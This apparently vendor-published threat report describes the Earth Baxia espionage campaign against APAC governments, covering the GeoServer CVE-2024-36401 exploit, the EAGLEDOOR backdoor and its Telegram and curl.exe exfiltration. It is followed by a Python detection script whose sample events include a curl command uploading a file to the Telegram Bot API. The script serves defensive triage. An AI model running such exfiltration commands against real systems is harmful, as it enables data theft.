Chinese Hackers Target APAC Governments with EAGLEDOOR Malware Exploiting GeoServer Flaw
Introduction
In a sophisticated cyber espionage campaign, a group of Chinese hackers has exploited a critical vulnerability in GeoServer to target government organizations across the Asia-Pacific (APAC) region. This operation, linked to the advanced persistent threat (APT) group known as Earth Baxia, highlights the evolving landscape of cyber threats facing sensitive sectors, including government and energy.
The Attack: Exploiting GeoServer Vulnerability
Cybersecurity researchers at Trend Micro identified the intrusion in July 2024 and found that the hackers leveraged a recently patched vulnerability (CVE-2024-36401) in OSGeo GeoServer GeoTools. With a critical CVSS score of 9.8, this flaw allowed the attackers to gain unauthorized access, posing a significant threat to entities in Taiwan and potentially other APAC nations such as the Philippines, South Korea, Vietnam, and Thailand.
Targeting Key Sectors
The primary targets of this campaign are believed to be government agencies, telecommunication firms, and energy sectors. The use of lure documents in Simplified Chinese indicates that the threat may extend to entities within China as well, although specific sectors have yet to be confirmed.
Multi-Stage Infection Process
The attackers employed a multi-stage infection process, utilizing both spear-phishing emails and the GeoServer vulnerability to deliver sophisticated malware. This includes the notorious Cobalt Strike and a newly identified backdoor named EAGLEDOOR, which enables data gathering and further payload delivery.
Techniques Used
Researchers noted that the attackers utilize advanced techniques, such as GrimResource and AppDomainManager injection methods, to deploy subsequent malware. One notable tactic involved using a decoy MSC file named RIPCOY, embedded in a ZIP attachment, to facilitate the download of additional malicious payloads.
EAGLEDOOR Malware: A Deeper Look
EAGLEDOOR, the malware developed for this campaign, boasts multiple communication methods with the command-and-control (C2) server, including DNS, HTTP, TCP, and Telegram. This versatility allows the attackers to transmit victim status updates, as well as upload and download files, leveraging the Telegram Bot API for seamless operations. Stolen data is exfiltrated using curl.exe, indicating a well-organized approach to information theft.
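The two EAGLEDOOR behaviours named above that are visible on an endpoint, curl.exe as the exfiltration tool and the Telegram Bot API as a channel, can be triaged from process-creation telemetry. The following is an added example, not code from Trend Micro or Foresiet; the event format, field names, sample events and scoring thresholds are constructed for illustration (api.telegram.org is the public Bot API hostname, and the bot token shown is a placeholder).

```python
import re

# Constructed process-creation events in a flattened Sysmon-style key=value form.
# None of these are real indicators from the Earth Baxia report.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\curl.exe|ParentImage=C:\\Users\\u1\\AppData\\Local\\Temp\\update.exe'
    '|CommandLine=curl.exe -F "document=@C:\\Users\\u1\\Documents\\export.rar" '
    'https://api.telegram.org/botPLACEHOLDER_TOKEN/sendDocument',
    'Image=C:\\Windows\\System32\\curl.exe|ParentImage=C:\\Windows\\System32\\cmd.exe'
    '|CommandLine=curl.exe -s https://example.internal/health',
    'Image=C:\\Program Files\\Git\\mingw64\\bin\\curl.exe|ParentImage=C:\\Program Files\\Git\\bin\\bash.exe'
    '|CommandLine=curl.exe -T build.log https://files.example.internal/upload',
    'Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe'
    '|CommandLine=notepad.exe notes.txt',
]

# curl options that send local data to a remote host (upload, form post, raw body).
UPLOAD_FLAGS = re.compile(r'(^|\s)(-F|-T|-d|--data|--data-binary|--upload-file|--form)(\s|$)')
# Telegram Bot API calls always use the /bot<token>/ path prefix on this host.
TELEGRAM_API = re.compile(r'https?://api\.telegram\.org/bot', re.IGNORECASE)
# Parent binaries living under a user's AppData tree are unusual launchers for curl.
USERLAND_PARENT = re.compile(r'\\Users\\[^\\]+\\AppData\\', re.IGNORECASE)


def parse_event(line):
    """Split a constructed 'k=v|k=v' event into a dict (fields here never contain '|')."""
    return dict(kv.split('=', 1) for kv in line.split('|'))


def score_event(ev):
    """Return (score, reasons) for one event; only curl.exe launches are scored."""
    if not ev.get('Image', '').lower().endswith('\\curl.exe'):
        return 0, []
    cmd = ev.get('CommandLine', '')
    reasons = []
    if TELEGRAM_API.search(cmd):
        reasons.append('curl.exe contacting the Telegram Bot API')
    if UPLOAD_FLAGS.search(cmd):
        reasons.append('curl.exe invoked with an upload flag')
    if USERLAND_PARENT.search(ev.get('ParentImage', '')):
        reasons.append('spawned by a binary under a user AppData directory')
    return len(reasons), reasons


def triage(lines, threshold=2):
    """Return (command_line, reasons) for events scoring at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.get('CommandLine', ''), reasons))
    return hits
```

With the default threshold, only the Telegram upload from an AppData-spawned parent is flagged; a lone `curl -T` from a build shell scores 1 and is left for lower-priority review, which is the trade-off to tune against an environment's legitimate curl usage.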
Connections to Other Threat Actors
Interestingly, this attack bears similarities to another operation linked to APT41, which also targeted Taiwanese and Vietnamese military and energy sectors. The overlap in techniques, particularly the use of Cobalt Strike C2 domains mimicking legitimate cloud services, suggests a collaborative or parallel effort among cybercriminals operating in the region.
Conclusion
The Earth Baxia campaign underscores the critical need for enhanced security measures in the face of growing cyber threats targeting sensitive government and energy sectors across APAC nations. Organizations must prioritize the detection of stolen credentials, invest in darknet monitoring services, and implement comprehensive digital footprint analysis to defend against brand impersonation and evaluate online risks. As the digital landscape continues to evolve, proactive cybersecurity strategies are essential to protect against increasingly sophisticated attacks like those orchestrated by Earth Baxia.
By adopting a multi-layered approach to security and utilizing effective brand protection strategies, organizations can mitigate the risks posed by these digital threats.
About Foresiet!
Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization's defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.
Protect your brand, reputation, data, and systems with Foresiet's Integrated Digital Risk Platform. 24/7/365 threat monitoring for total peace of mind.
Dec. 11, 2024, 6:29 p.m.
Nov. 29, 2024, 5:43 p.m.